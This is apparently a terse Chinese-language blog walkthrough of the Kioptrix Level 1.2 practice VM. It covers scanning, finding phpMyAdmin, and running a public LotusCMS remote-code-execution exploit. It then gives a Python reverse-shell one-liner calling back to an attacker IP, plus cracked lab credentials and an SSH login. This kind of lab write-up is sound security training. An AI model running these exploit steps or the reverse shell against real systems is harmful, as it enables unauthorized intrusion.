kioprtix level 1.2

kioprtix level 1.2

存活探测+端口扫描

kioprtix level 1.2

访问80

kioprtix level 1.2

同时做一个目录扫描

发现

http://10.0.4.18/phpmyadmin/index.php

指纹识别

kioprtix level 1.2

cms漏洞查找

kioprtix level 1.2

测试代码执行,存在漏洞

反弹shell

github找到poc

git clone https://github.com/Hood3dRob1n/LotusCMS-Exploit

git clone https://github.com/Hood3dRob1n/LotusCMS-Exploit
cd LotusCMS-Exploit/
chmod 777 lotusRCE.sh
nc -lvp <port>
./lotusRCE.sh 10.0.4.18
<你的ip>
<刚才的port>
1

kioprtix level 1.2

交互的会话,采用再次反弹

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.4.10',5656));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

kioprtix level 1.2

寻找敏感信息

kioprtix level 1.2

kioprtix level 1.2

看到数据库账号和密码

登录phpmyadmin

kioprtix level 1.2

kioprtix level 1.2看到超管密码,测试无法ssh登录,估计是we端的

kioprtix level 1.2

还有一个

kioprtix level 1.2

md5解密下

kioprtix level 1.2

kioprtix level 1.2

starwars Mast3r

尝试ssh登录,成功登录

kioprtix level 1.2

kioprtix level 1.2

kioprtix level 1.2

登录后发现loneferrethome下有几个文件

查看

kioprtix level 1.2

这个应该就是提权的暗示了

百度教程

kioprtix level 1.2

kioprtix level 1.2

上一篇:PAT (Basic Level) Practice 1047 编程团体赛 (20 分)


下一篇:2021-12-22_学习B站Java基础视频_IO流(列出目录下所有内容-递归-带层次)